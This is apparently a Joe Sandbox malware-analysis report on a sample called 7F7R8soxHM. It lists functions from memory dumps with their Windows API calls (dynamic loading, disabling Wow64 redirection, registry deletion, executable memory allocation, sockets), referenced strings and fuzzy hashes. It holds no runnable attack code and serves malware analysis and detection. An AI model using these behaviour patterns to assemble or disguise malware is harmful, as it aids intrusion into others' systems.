Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
Instruction ID: 546b7ab55a055e24a678230dacced64190c57b0ea385e3075c9bffd85b963531
Opcode Fuzzy Hash: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
Instruction Fuzzy Hash: DB21BF32500218BBDF158E64CC42FEA3BA9EF88728F111254FE55BB1D0DAB1A851DBA0

Function 00EF6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF6FDF

Strings

Listbox, xrefs: 00EF6F77

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
Instruction ID: da705b0381819c3da0162b3069299258195ed94eed6cdc4412c3ad4c7ba2eb87
Opcode Fuzzy Hash: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
Instruction Fuzzy Hash: D3218032710118BFDF118F54DC85EBB3BAAEF89764F019124FA14AB190CA71AC51DBA0

Function 00EF797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7A03

Strings

msctls_trackbar32, xrefs: 00EF79B8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
Instruction ID: 5798e3f9ef22b8c84b46e25b0399a7ccdbc858f3aac1f15ce0f4dbd10cc46afc
Opcode Fuzzy Hash: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
Instruction Fuzzy Hash: 8511E732244208BADF149F64CC05FEB77A9EFC9768F025519FB41B6090D671D811DB60

Function 00E74C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E74C2E), ref: 00E74CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E74CB5

Strings

kernel32.dll, xrefs: 00E74C9E
GetNativeSystemInfo, xrefs: 00E74CAF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
Instruction ID: 1fef897b9b5b4d87c03fcd5709b12d73752fe70e3bd6bd16542f54f1634c2a71
Opcode Fuzzy Hash: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
Instruction Fuzzy Hash: 4DD05E70511727CFE7309F32DE58626B6E5AF45795B21D83ED88AF6290E770D880CA50

Function 00E74D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E74CE1,?), ref: 00E74DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74DB4

Strings

kernel32.dll, xrefs: 00E74D9D
Wow64RevertWow64FsRedirection, xrefs: 00E74DAE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
Instruction ID: 65a1be59fccff1ff0703d302c8dd21a1934f910c31324b45f2f80c6b06444e9c
Opcode Fuzzy Hash: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
Instruction Fuzzy Hash: EFD05E71550723CFD7309F32D858A5676E4AF05359B11D83ED9DAF6290E770D884CA50

Function 00E74D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E74D2E,?,00E74F4F,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E74D81

Strings

kernel32.dll, xrefs: 00E74D6A
Wow64DisableWow64FsRedirection, xrefs: 00E74D7B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
Instruction ID: d80003d05675f6db4100395fa3d76d619a43827b7340887126480b521e2b2d7e
Opcode Fuzzy Hash: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
Instruction Fuzzy Hash: 2ED01770510723CFD7309F32D84862676E8AF55356B11D83AD5CAE6290E770D884CA50

Function 00EF1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00EF12C1), ref: 00EF1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1092

Strings

RegDeleteKeyExW, xrefs: 00EF108C
advapi32.dll, xrefs: 00EF107B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
Instruction ID: f4389fe666247f1b539c26d40836c63ded4e6e554091e97b155b86a0e0c4bed1
Opcode Fuzzy Hash: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
Instruction Fuzzy Hash: 5DD0123051072BCFD7305F35D81852676E4AF45355B118C79E885E6290EB74D4C0C751

Function 00EE93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE9009,?,00EFF910), ref: 00EE9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE9415

Strings

kernel32.dll, xrefs: 00EE93FE
GetModuleHandleExW, xrefs: 00EE940F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
Instruction ID: 5b4aa14a9ad1ac086b09d7dc0b367d259982712966174db44372efd559f2cea9
Opcode Fuzzy Hash: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
Instruction Fuzzy Hash: 5CD0C73050032BCFC7208F33D98821272E4AF00341B00C83AE492F2692E670C880CA10

Function 00EB1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00EB1B42
__swprintf.LIBCMT ref: 00EB1B73

Strings

%.3d, xrefs: 00EB1B4D
WIN_XPe, xrefs: 00EB1BB2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 8270b50a99bf1297be2d2a4bb87d5450f30722743328cfb753fd8089c6af370d
Instruction ID: 642a96969db95e3bfc9e6fa7a756f7fbecd2db99ef678de2015469953cf232db
Opcode Fuzzy Hash: 8270b50a99bf1297be2d2a4bb87d5450f30722743328cfb753fd8089c6af370d
Instruction Fuzzy Hash: 30D01271804218EACB189AA09C94CFB737CAB04321F9465D2F506B1040F6349B85EB26

Function 00EC76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
Instruction ID: f1fd241756b4ea2a02d96e913f42d758116e4e7c965c2daa6fe04a7af5634d45
Opcode Fuzzy Hash: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
Instruction Fuzzy Hash: 91C15975A04216EFCB14CF94C984EAEBBB5FF88314B11959DE886EB250D731DD82CB90

Function 00EEE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00EEE3D2
CharLowerBuffW.USER32(?,?), ref: 00EEE415

Part of subcall function 00EEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE615
_memmove.LIBCMT ref: 00EEE628

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 0f83b3d8740088a5ed1b56419c8507039aefd58972d83fa5f0f48249409bd8bc
Instruction ID: b1003cea3f160d2affcafa446fe813b36ef25e7f576b8b0f147034bc86ae7072
Opcode Fuzzy Hash: 0f83b3d8740088a5ed1b56419c8507039aefd58972d83fa5f0f48249409bd8bc
Instruction Fuzzy Hash: 2DC17C716083419FC714DF29C48096ABBE4FF88718F14996EF899AB351D731EA45CB82

Function 00EE83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EE83D8
CoUninitialize.OLE32 ref: 00EE83E3

Part of subcall function 00ECDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5

VariantInit.OLEAUT32(?), ref: 00EE83EE
VariantClear.OLEAUT32(?), ref: 00EE86BF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 267b627b31ee00c2eb18c966f23a16497de10c03d05a7bbbeb1da9df15635052
Instruction ID: bc28fc5c2c00b609283159cce79c02faa85577fb454419a0bb81bf646207f75e
Opcode Fuzzy Hash: 267b627b31ee00c2eb18c966f23a16497de10c03d05a7bbbeb1da9df15635052
Instruction Fuzzy Hash: E1A139752047459FDB10DF15C585B2AB7E4BF88324F14A45DFA9AAB3A2CB30ED04CB42

Function 00EC7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C4A
CLSIDFromProgID.OLE32(?,?,00000000,00EFFB80,000000FF,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C6F
_memcmp.LIBCMT ref: 00EC7C90

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
Instruction ID: 980dffa56f629756cfd750c268a2b0cec5f0d2b22bd372c6a4c05feb1bcd997b
Opcode Fuzzy Hash: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
Instruction Fuzzy Hash: A781E975A00109EFCB04DF94C984EEEB7B9FF89315F208598E555BB250DB72AE06CB60

Function 00EC6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EC6E04
SysAllocString.OLEAUT32(00000000), ref: 00EC6EAD
VariantCopy.OLEAUT32 ref: 00EC6EDC
VariantClear.OLEAUT32(?), ref: 00EC6F03

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: b666be7dd58516aa76b295ca81894c69ea5f2e2ef51e9cedd04bccb4ce5e4ead
Instruction ID: 23519ea4c1c32eb1f78497f54d07248766ea45f6cbd1e7fa46aceaf320bb75de
Opcode Fuzzy Hash: b666be7dd58516aa76b295ca81894c69ea5f2e2ef51e9cedd04bccb4ce5e4ead
Instruction Fuzzy Hash: 825195317043019FDB24AF65D592F6AB3E5AF48310F20A81FF59AEB291DA719842DF11

Function 00ED97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D

Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1

_free.LIBCMT ref: 00ED992C
_free.LIBCMT ref: 00ED9933
_free.LIBCMT ref: 00ED999E

Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB

_free.LIBCMT ref: 00ED99A6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction ID: 9380df5a4be3717832490c73cf1766dbd14c703021bc052efbc5ce0ef55ad866
Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction Fuzzy Hash: 4B516EB1904218AFDF249F64CC81AAEBBB9EF48310F0054AEB609B7341DB715E81CF58

Function 00EF9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0177E5D0,?), ref: 00EF9AD2
ScreenToClient.USER32(00000002,00000002), ref: 00EF9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EF9B72

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
Instruction ID: 7a32a8e60ee112965ba3f5e739aebb694a94bf82966b94f16124f8b9e06f0804
Opcode Fuzzy Hash: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
Instruction Fuzzy Hash: 59512C34A0060DAFCF24DF68D880ABE7BB6FF44324F149259FA55AB291D730AD41DB94

Function 00EE6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6CE4
WSAGetLastError.WSOCK32(00000000), ref: 00EE6CF4

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE6D58
WSAGetLastError.WSOCK32(00000000), ref: 00EE6D64

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
Instruction ID: 1bb7243fa7e3f233d9fd2791b57df5448071c6aa6f8ac91652820f157da7517e
Opcode Fuzzy Hash: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
Instruction Fuzzy Hash: B0416B75740200AFEB20AF24DC86F3A76E5EF58B24F44D418FA59BB2D3DA719D008B91

Function 00EE672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EFF910), ref: 00EE67BA
_strlen.LIBCMT ref: 00EE67EC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 7707001ff9a98a611233a33cda36621fdd6a0855f8911fd97b2464b2e964ef6d
